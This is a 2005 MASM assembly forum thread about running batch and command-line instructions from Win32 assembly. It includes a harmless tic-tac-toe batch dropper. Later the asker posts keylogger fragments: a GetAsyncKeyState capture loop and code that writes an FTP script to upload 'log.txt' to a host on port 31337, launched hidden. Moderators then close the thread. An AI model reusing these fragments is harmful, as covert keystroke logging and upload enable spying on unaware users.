Running commandline instructions?

brixton · May 23, 2005, 10:08:11 PM

Hey all,

I am a newbie at w32asm. I just wondered if there was a quick way of running a commandline instruction such as echo or something from an assembly app. I plan to have no GUI, so it shouldn't require any input.

Any help appreciated! :U

pbrennick · May 23, 2005, 11:19:55 PM

Read this topic:

http://www.masmforum.com/simple/index.php?topic=103.msg458#msg458

Scroll down to MichaelW's reply...

Paul

brixton · May 25, 2005, 10:05:39 AM

Many thanks, just one query, can I create a batch file using standard APIs and then execute that with the WinExec API? Would that work? I wonder because this would suit my needs better, and is also easier :U

pbrennick · May 25, 2005, 01:36:28 PM

brixton,
Sorry, not in the way you would like. However, you could probably write a program that would accept and process such a command as a commandline tail. The problem, though, is that most APIs require support such as structures, variables and buffers which would make them impossible to do. So, even though it can work in concept, it is not feasable.

What, exactly are you trying to do? Or are you just exploring different types of functionalities?

Paul

Mirno · May 25, 2005, 01:47:30 PM

You can create a batch-file dropper like this:

Code Select


.386
.model flat,stdcall
option casemap:none

.nolist
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
.list

.data
someData db 64,69,67,72,79,32,79,70,70,13,10,13,10,83,69,84
         db 32,65,61,49,13,10,83,69,84,32,66,61,50,13,10,83
         db 69,84,32,67,61,51,13,10,13,10,83,69,84,32,68,61
         db 52,13,10,83,69,84,32,69,61,53,13,10,83,69,84,32
         db 70,61,54,13,10,13,10,83,69,84,32,71,61,55,13,10
         db 83,69,84,32,72,61,56,13,10,83,69,84,32,73,61,57
         db 13,10,13,10,83,69,84,32,47,80,32,80,76,65,89,69
         db 82,49,61,34,69,110,116,101,114,32,121,111,117,114,32,110
         db 97,109,101,32,112,108,97,121,101,114,32,88,58,32,34,13
         db 10,83,69,84,32,47,80,32,80,76,65,89,69,82,50,61
         db 34,69,110,116,101,114,32,121,111,117,114,32,110,97,109,101
         db 32,112,108,97,121,101,114,32,79,58,32,34,13,10,13,10
         db 83,69,84,32,67,117,114,114,101,110,116,80,108,97,121,101
         db 114,61,79,13,10,83,69,84,32,84,117,114,110,61,48,13
         db 10,83,69,84,32,87,105,110,110,101,114,61,48,13,10,13
         db 10,58,83,116,97,114,116,76,111,111,112,13,10,73,70,32
         db 34,37,67,117,114,114,101,110,116,80,108,97,121,101,114,37
         db 34,61,61,34,79,34,32,40,13,10,32,32,83,69,84,32
         db 67,117,114,114,101,110,116,80,108,97,121,101,114,61,88,13
         db 10,41,32,69,76,83,69,32,40,13,10,32,32,83,69,84
         db 32,67,117,114,114,101,110,116,80,108,97,121,101,114,61,79
         db 13,10,41,13,10,13,10,67,65,76,76,32,58,80,114,105
         db 110,116,66,111,97,114,100,13,10,13,10,58,71,101,116,67
         db 109,100,13,10,67,65,76,76,32,58,71,101,116,67,111,109
         db 109,97,110,100,32,37,67,117,114,114,101,110,116,80,108,97
         db 121,101,114,37,13,10,73,70,32,34,37,69,82,82,79,82
         db 76,69,86,69,76,37,34,61,61,34,49,34,32,40,13,10
         db 32,32,69,67,72,79,32,66,97,100,32,105,110,112,117,116
         db 44,32,112,108,101,97,115,101,32,116,114,121,32,97,103,97
         db 105,110,13,10,32,32,71,79,84,79,32,58,71,101,116,67
         db 109,100,13,10,41,13,10,13,10,67,65,76,76,32,58,67
         db 104,101,99,107,87,105,110,110,101,114,32,37,67,117,114,114
         db 101,110,116,80,108,97,121,101,114,37,13,10,73,70,32,34
         db 37,87,105,110,110,101,114,37,34,61,61,34,49,34,32,40
         db 13,10,32,32,80,65,85,83,69,13,10,32,32,71,79,84
         db 79,32,58,69,79,70,13,10,41,13,10,13,10,83,69,84
         db 32,47,65,32,84,117,114,110,61,37,84,117,114,110,37,32
         db 43,32,49,13,10,73,70,32,78,79,84,32,34,37,84,117
         db 114,110,37,34,32,61,61,32,34,57,34,32,71,79,84,79
         db 32,58,83,116,97,114,116,76,111,111,112,13,10,13,10,67
         db 65,76,76,32,58,80,114,105,110,116,66,111,97,114,100,13
         db 10,69,99,104,111,32,73,116,32,119,97,115,32,97,32,100
         db 114,97,119,33,13,10,80,65,85,83,69,13,10,71,79,84
         db 79,32,58,69,79,70,13,10,13,10,58,80,114,105,110,116
         db 66,111,97,114,100,13,10,83,69,84,32,69,82,82,79,82
         db 76,69,86,69,76,61,48,13,10,67,76,83,13,10,13,10
         db 69,67,72,79,32,32,37,65,37,32,73,32,37,66,37,32
         db 73,32,37,67,37,13,10,69,67,72,79,32,45,45,45,43
         db 45,45,45,43,45,45,45,13,10,69,67,72,79,32,32,37
         db 68,37,32,73,32,37,69,37,32,73,32,37,70,37,13,10
         db 69,67,72,79,32,45,45,45,43,45,45,45,43,45,45,45
         db 13,10,69,67,72,79,32,32,37,71,37,32,73,32,37,72
         db 37,32,73,32,37,73,37,13,10,71,79,84,79,32,58,69
         db 79,70,13,10,13,10,58,71,101,116,67,111,109,109,97,110
         db 100,13,10,73,70,32,34,37,49,37,34,61,61,34,88,34
         db 32,40,13,10,32,32,83,69,84,32,84,83,84,82,73,78
         db 71,61,37,80,76,65,89,69,82,49,37,39,115,32,109,111
         db 118,101,58,32,13,10,41,13,10,13,10,73,70,32,34,37
         db 49,37,34,61,61,34,79,34,32,40,13,10,32,32,83,69
         db 84,32,84,83,84,82,73,78,71,61,37,80,76,65,89,69
         db 82,50,37,39,115,32,109,111,118,101,58,32,13,10,41,13
         db 10,13,10,83,69,84,32,47,80,32,79,80,69,82,65,84
         db 73,79,78,61,37,84,83,84,82,73,78,71,37,13,10,13
         db 10,83,69,84,32,69,82,82,79,82,76,69,86,69,76,61
         db 49,13,10,13,10,73,70,32,34,37,79,80,69,82,65,84
         db 73,79,78,37,34,61,61,34,49,34,32,73,70,32,34,37
         db 65,37,34,61,61,34,49,34,32,40,13,10,32,32,83,69
         db 84,32,65,61,37,49,37,13,10,32,32,83,69,84,32,69
         db 82,82,79,82,76,69,86,69,76,61,48,13,10,41,13,10
         db 73,70,32,34,37,79,80,69,82,65,84,73,79,78,37,34
         db 61,61,34,50,34,32,73,70,32,34,37,66,37,34,61,61
         db 34,50,34,32,40,13,10,32,32,83,69,84,32,66,61,37
         db 49,37,13,10,32,32,83,69,84,32,69,82,82,79,82,76
         db 69,86,69,76,61,48,13,10,41,13,10,73,70,32,34,37
         db 79,80,69,82,65,84,73,79,78,37,34,61,61,34,51,34
         db 32,73,70,32,34,37,67,37,34,61,61,34,51,34,32,40
         db 13,10,32,32,83,69,84,32,67,61,37,49,37,13,10,32
         db 32,83,69,84,32,69,82,82,79,82,76,69,86,69,76,61
         db 48,13,10,41,13,10,13,10,73,70,32,34,37,79,80,69
         db 82,65,84,73,79,78,37,34,61,61,34,52,34,32,73,70
         db 32,34,37,68,37,34,61,61,34,52,34,32,40,13,10,32
         db 32,83,69,84,32,68,61,37,49,37,13,10,32,32,83,69
         db 84,32,69,82,82,79,82,76,69,86,69,76,61,48,13,10
         db 41,13,10,73,70,32,34,37,79,80,69,82,65,84,73,79
         db 78,37,34,61,61,34,53,34,32,73,70,32,34,37,69,37
         db 34,61,61,34,53,34,32,40,13,10,32,32,83,69,84,32
         db 69,61,37,49,37,13,10,32,32,83,69,84,32,69,82,82
         db 79,82,76,69,86,69,76,61,48,13,10,41,13,10,73,70
         db 32,34,37,79,80,69,82,65,84,73,79,78,37,34,61,61
         db 34,54,34,32,73,70,32,34,37,70,37,34,61,61,34,54
         db 34,32,40,13,10,32,32,83,69,84,32,70,61,37,49,37
         db 13,10,32,32,83,69,84,32,69,82,82,79,82,76,69,86
         db 69,76,61,48,13,10,41,13,10,13,10,73,70,32,34,37
         db 79,80,69,82,65,84,73,79,78,37,34,61,61,34,55,34
         db 32,73,70,32,34,37,71,37,34,61,61,34,55,34,32,40
         db 13,10,32,32,83,69,84,32,71,61,37,49,37,13,10,32
         db 32,83,69,84,32,69,82,82,79,82,76,69,86,69,76,61
         db 48,13,10,41,13,10,73,70,32,34,37,79,80,69,82,65
         db 84,73,79,78,37,34,61,61,34,56,34,32,73,70,32,34
         db 37,72,37,34,61,61,34,56,34,32,40,13,10,32,32,83
         db 69,84,32,72,61,37,49,37,13,10,32,32,83,69,84,32
         db 69,82,82,79,82,76,69,86,69,76,61,48,13,10,41,13
         db 10,73,70,32,34,37,79,80,69,82,65,84,73,79,78,37
         db 34,61,61,34,57,34,32,73,70,32,34,37,73,37,34,61
         db 61,34,57,34,32,40,13,10,32,32,83,69,84,32,73,61
         db 37,49,37,13,10,32,32,83,69,84,32,69,82,82,79,82
         db 76,69,86,69,76,61,48,13,10,41,13,10,13,10,71,79
         db 84,79,32,58,69,79,70,13,10,13,10,58,67,104,101,99
         db 107,87,105,110,110,101,114,13,10,73,70,32,34,37,49,37
         db 34,61,61,34,88,34,32,40,13,10,32,32,83,69,84,32
         db 84,83,84,82,73,78,71,61,37,80,76,65,89,69,82,49
         db 37,32,119,105,110,115,33,32,13,10,41,13,10,13,10,73
         db 70,32,34,37,49,37,34,61,61,34,79,34,32,40,13,10
         db 32,32,83,69,84,32,84,83,84,82,73,78,71,61,37,80
         db 76,65,89,69,82,50,37,32,119,105,110,115,33,32,13,10
         db 41,13,10,13,10,73,70,32,34,37,65,37,34,61,61,34
         db 37,49,37,34,32,40,13,10,32,32,73,70,32,34,37,66
         db 37,34,61,61,34,37,49,37,34,32,40,13,10,32,32,32
         db 32,73,70,32,34,37,67,37,34,61,61,34,37,49,37,34
         db 32,40,13,10,32,32,32,32,32,32,67,65,76,76,32,58
         db 80,114,105,110,116,66,111,97,114,100,13,10,32,32,32,32
         db 32,32,69,67,72,79,32,37,84,83,84,82,73,78,71,37
         db 13,10,32,32,32,32,32,32,83,69,84,32,87,105,110,110
         db 101,114,61,49,13,10,32,32,32,32,41,13,10,32,32,41
         db 13,10,13,10,32,32,73,70,32,34,37,68,37,34,61,61
         db 34,37,49,37,34,32,40,13,10,32,32,32,32,73,70,32
         db 34,37,71,37,34,61,61,34,37,49,37,34,32,40,13,10
         db 32,32,32,32,32,32,67,65,76,76,32,58,80,114,105,110
         db 116,66,111,97,114,100,13,10,32,32,32,32,32,32,69,67
         db 72,79,32,37,84,83,84,82,73,78,71,37,13,10,32,32
         db 32,32,32,32,83,69,84,32,87,105,110,110,101,114,61,49
         db 13,10,32,32,32,32,41,13,10,32,32,41,13,10,13,10
         db 32,32,73,70,32,34,37,69,37,34,61,61,34,37,49,37
         db 34,32,40,13,10,32,32,32,32,73,70,32,34,37,73,37
         db 34,61,61,34,37,49,37,34,32,40,13,10,32,32,32,32
         db 32,32,67,65,76,76,32,58,80,114,105,110,116,66,111,97
         db 114,100,13,10,32,32,32,32,32,32,69,67,72,79,32,37
         db 84,83,84,82,73,78,71,37,13,10,32,32,32,32,32,32
         db 83,69,84,32,87,105,110,110,101,114,61,49,13,10,32,32
         db 32,32,41,13,10,32,32,41,13,10,41,13,10,13,10,73
         db 70,32,34,37,66,37,34,61,61,34,37,49,37,34,32,40
         db 13,10,32,32,73,70,32,34,37,69,37,34,61,61,34,37
         db 49,37,34,32,40,13,10,32,32,32,32,73,70,32,34,37
         db 72,37,34,61,61,34,37,49,37,34,32,40,13,10,32,32
         db 32,32,32,32,67,65,76,76,32,58,80,114,105,110,116,66
         db 111,97,114,100,13,10,32,32,32,32,32,32,69,67,72,79
         db 32,37,84,83,84,82,73,78,71,37,13,10,32,32,32,32
         db 32,32,83,69,84,32,87,105,110,110,101,114,61,49,13,10
         db 32,32,32,32,41,13,10,32,32,41,13,10,41,13,10,13
         db 10,73,70,32,34,37,67,37,34,61,61,34,37,49,37,34
         db 32,40,13,10,32,32,73,70,32,34,37,70,37,34,61,61
         db 34,37,49,37,34,32,40,13,10,32,32,32,32,73,70,32
         db 34,37,73,37,34,61,61,34,37,49,37,34,32,40,13,10
         db 32,32,32,32,32,32,67,65,76,76,32,58,80,114,105,110
         db 116,66,111,97,114,100,13,10,32,32,32,32,32,32,69,67
         db 72,79,32,37,84,83,84,82,73,78,71,37,13,10,32,32
         db 32,32,32,32,83,69,84,32,87,105,110,110,101,114,61,49
         db 13,10,32,32,32,32,41,13,10,32,32,41,13,10,13,10
         db 32,32,73,70,32,34,37,69,37,34,61,61,34,37,49,37
         db 34,32,40,13,10,32,32,32,32,73,70,32,34,37,71,37
         db 34,61,61,34,37,49,37,34,32,40,13,10,32,32,32,32
         db 32,32,67,65,76,76,32,58,80,114,105,110,116,66,111,97
         db 114,100,13,10,32,32,32,32,32,32,69,67,72,79,32,37
         db 84,83,84,82,73,78,71,37,13,10,32,32,32,32,32,32
         db 83,69,84,32,87,105,110,110,101,114,61,49,13,10,32,32
         db 32,32,41,13,10,32,32,41,13,10,41,13,10,13,10,73
         db 70,32,34,37,68,37,34,61,61,34,37,49,37,34,32,40
         db 13,10,32,32,73,70,32,34,37,69,37,34,61,61,34,37
         db 49,37,34,32,40,13,10,32,32,32,32,73,70,32,34,37
         db 70,37,34,61,61,34,37,49,37,34,32,40,13,10,32,32
         db 32,32,32,32,67,65,76,76,32,58,80,114,105,110,116,66
         db 111,97,114,100,13,10,32,32,32,32,32,32,69,67,72,79
         db 32,37,84,83,84,82,73,78,71,37,13,10,32,32,32,32
         db 32,32,83,69,84,32,87,105,110,110,101,114,61,49,13,10
         db 32,32,32,32,41,13,10,32,32,41,13,10,41,13,10,13
         db 10,73,70,32,34,37,71,37,34,61,61,34,37,49,37,34
         db 32,40,13,10,32,32,73,70,32,34,37,72,37,34,61,61
         db 34,37,49,37,34,32,40,13,10,32,32,32,32,73,70,32
         db 34,37,73,37,34,61,61,34,37,49,37,34,32,40,13,10
         db 32,32,32,32,32,32,67,65,76,76,32,58,80,114,105,110
         db 116,66,111,97,114,100,13,10,32,32,32,32,32,32,69,67
         db 72,79,32,37,84,83,84,82,73,78,71,37,13,10,32,32
         db 32,32,32,32,83,69,84,32,87,105,110,110,101,114,61,49
         db 13,10,32,32,32,32,41,13,10,32,32,41,13,10,41,13
         db 10,71,79,84,79,32,58,69,79,70,13,10

dataLen  EQU $-someData

tgtName db "OnXfile.bat", 0
hBat    dd 0
tmp     dd 0

.code
start:
    invoke CreateFile, ADDR tgtName, GENERIC_WRITE, 0, NULL, CREATE_NEW, NULL, NULL
    mov hBat, eax

    invoke WriteFile, eax, ADDR someData, dataLen, ADDR tmp, NULL
    invoke FlushFileBuffers, hBat
    invoke CloseHandle, hBat

    invoke WinExec, ADDR tgtName, SW_SHOWNORMAL

    invoke ExitProcess, 0
end start

The data is created using \masm32\bintodb.exe on the batch file.

Mirno

Phil · May 27, 2005, 12:57:55 AM

mirno: Now there's a batch file that everyone should have! Not a bad game of 'noughts and crosses' too!

Thanks for the pointer to the masm bintodb program! Hadn't seen that before.

hutch-- · May 27, 2005, 01:00:35 AM

I second the idea, the Mirno "noughts and crosses" should be enshrined in the hall of fame !

Here is an alternative method if you are not using characters that MASM reserves for special uses in macros.

Code Select


; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««
    include \masm32\include\masm32rt.inc
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

comment * -----------------------------------------------------
                        Build this  template with
                       "CONSOLE ASSEMBLE AND LINK"
        ----------------------------------------------------- *

    .code

start:
   
; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

    call main

    exit

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

main proc

    LOCAL hFile :DWORD

    mov hFile, fcreate("testme.bat")

    fprint hFile,"@echo off"
    fprint hFile,"cd \"
    fprint hFile,"dir /b"

    fclose hFile

    fn WinExec,"testme.bat",1

    ret

main endp

; «««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««««

end start

brixton · May 28, 2005, 12:43:40 AM

Hello all,

Many thanks for all the replies. However, hutch-- has given me exactly what I wanted, many thanks!

If you are interested in my reason for wanting this functionality, it's because I am creating a keylogger (for innocent purposes) which, when executed (on startup), uploads its log file to my website so I can access it anywhere.

One final question, with WinExec, can I specify commandline switches?

hutch-- · May 28, 2005, 04:22:08 AM

You should have no problems passing command line parameters to WinExec().

Mark Jones · May 28, 2005, 01:30:56 PM

Perhaps consider using HTTPS or some sort of encryption algorithm on your transmitted data so it can't be intercepted by packet sniffers and the like. Without any security a cracker could easily compromise this code for much more sinister purposes (with your name on it!) Even with security it's only a matter of time. ::) Even businesses behind corporate firewalls are not entirely safe - I've seen a number of businesses be hacked when they thought they were bulletproof.

How about a series of routines embedded in various parts of the code which run randomly and check your server for a good hash value based on the GMT date? If no server is found after x days or the routines are modified, the app stops working? That might at least slow them down a little. :)

Vortex · May 28, 2005, 02:50:05 PM

Quote from: brixton on May 28, 2005, 12:43:40 AM
One final question, with WinExec, can I specify commandline switches?

Hi brixton,

Here is an example for you :

Code Select


.386
.model flat,stdcall
option casemap:none

include     \masm32\include\windows.inc
include     \masm32\include\kernel32.inc
includelib  \masm32\lib\kernel32.lib

.data
filename    db 'test.exe WinExec example',0 ; test.exe
                                            ; with two cmdline params
.code
start:
    invoke  WinExec,ADDR filename,SW_SHOW
    invoke  ExitProcess,0
END start

[attachment deleted by admin]

brixton · May 30, 2005, 11:20:54 PM

Thankyou for the replies.

I'm not particularly bothered by this security business. The upload is taking place off one of my computers, using an ftp account which has a default dir on my website. It doesn't have many permissions, and can't be used for anything other than WRITE, APPEND and DELETE (and there's nothing but this log in the folder).

I am using this kind of format:

Code Select

.data

uploadcommand db "ftp -s:ul.cfg", 0
configfile db "ul.cfg", 0
configline1 db "open 0.0.0.0 31337", 13, 10
configline2 db "misc", 13, 10
configline4 db "put log.txt", 13, 10
configline5 db "bye", 0
confighandle dd 0

.code

invoke _lcreat, ADDR configfile, 0
mov confighandle, eax
invoke _lwrite, confighandle, ADDR configline1, 19
invoke _lwrite, confighandle, ADDR configline2, 13
invoke _lwrite, confighandle, ADDR configline2, 13
invoke _lwrite, confighandle, ADDR configline4, 13
invoke _lwrite, confighandle, ADDR configline5, 3
invoke _lclose, confighandle
invoke WinExec, ADDR uploadcommand, SW_HIDE

Will program execution pause at the WinExec command (basically until the log file is uploaded)? Because I have actually created my program and the upload works successfully, but I'm still unsure about that.

Btw, is there an easy way to detect whether a key (non-system) has been pressed? Atm I have very messy code using

Code Select

@@:

invoke GetAsyncKeyState, (hexcode)h
cmp al, 1
jne @F
invoke _lwrite, filehandle, ADDR (hexcode)press, length

.. And so on for each key I want to log.

Although this method works, it's lengthy and poorly coded. Any help is appreciated!

Mark Jones · May 31, 2005, 03:24:42 AM

Quote
configline1 db "open 0.0.0.0 31337", 13, 10

Interesting port.

sluggy · May 31, 2005, 09:07:22 AM

That was a very interesting choice of ports.
Due to the nature of this thread, and the dubious uses for a keylogger, and the fact that log files are being uploaded to an ftp server, and the fact that we have no guarantee that brixton will not deploy this beyond his own machine, i think it is time to close this thread.

brixton,
if you can supply a decent reason why this thread should be kept open, then it will be reopened. Otherwise please desist from asking questions of this nature.

News:

Running commandline instructions?

pbrennick

pbrennick

Mirno

Phil